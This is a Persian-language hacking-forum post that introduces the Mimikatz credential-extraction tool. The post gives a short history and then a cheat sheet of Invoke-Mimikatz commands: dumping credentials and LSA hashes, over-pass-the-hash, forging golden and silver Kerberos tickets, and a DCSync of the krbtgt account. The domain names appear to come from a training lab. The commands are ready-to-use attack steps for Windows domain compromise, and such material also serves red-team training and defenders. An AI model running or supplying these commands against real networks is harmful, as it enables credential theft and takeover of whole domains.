معرفی mimikatz

716

پیشکسوت

تاریخ عضویت: Nov 2021

نوشته: 558
- اشتراک
- توییت
#1

معرفی mimikatz

07-28-2022, 02:34 PM

Mimikatz یک ابزار اکسپلویت در ویندوز است که رمزهای عبور ذخیره شده در حافظه را استخراج می‌کند.
این برنامه توسط برنامه‌نویس فرانسوی بنجامین دلپی ساخته شده است و در زبان عامیانه فرانسوی به معنای "گربه‌های زیبا" است.

بنجامین دلپی نقصی را در مایکروسافت ویندوز کشف کرد که هم یک کپی رمزنگاری شده از یک رمز عبور را استخراج می‌کند و هم کلیدی که می‌تواند برای رمزگشایی آن در حافظه در یک زمان مورد استفاده قرار گیرد.

او در سال 2011 با مایکروسافت تماس گرفت تا این نقص را گزارش کند.

دلپی متوجه شد که این نقص می‌تواند برای دسترسی به ماشین‌های غیرقابل نفوذ در شبکه از طریق یک ماشین آسیب‌پذیر استفاده شود.

او اولین نسخه از این نرم افزار را در 2 May منتشر کرد.

دستورات :
Dump Creds

کد:

Invoke-Mimikatz -DumpCreds Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")

Over Pass The Hash

کد:

Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlm_hash> /run:powershell.exe"[/LEFT]

Dump Hashes

کد:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc

Creating Tickets

Create A Golden Ticke

کد:

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_SID> /krbtgt:<NTLM_hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Create A Silver Ticket

کد:

[LEFT]Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"' [/LEFT]

DCSync Attack

DA privileges required!

کد:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

ویرایش توسط 716 : https://www.iranhack.com/forum/member/6912-716 در ساعت 07-28-2022, 03:12 PM
برچسب ها: هیچ یک

اطلاعیه

معرفی mimikatz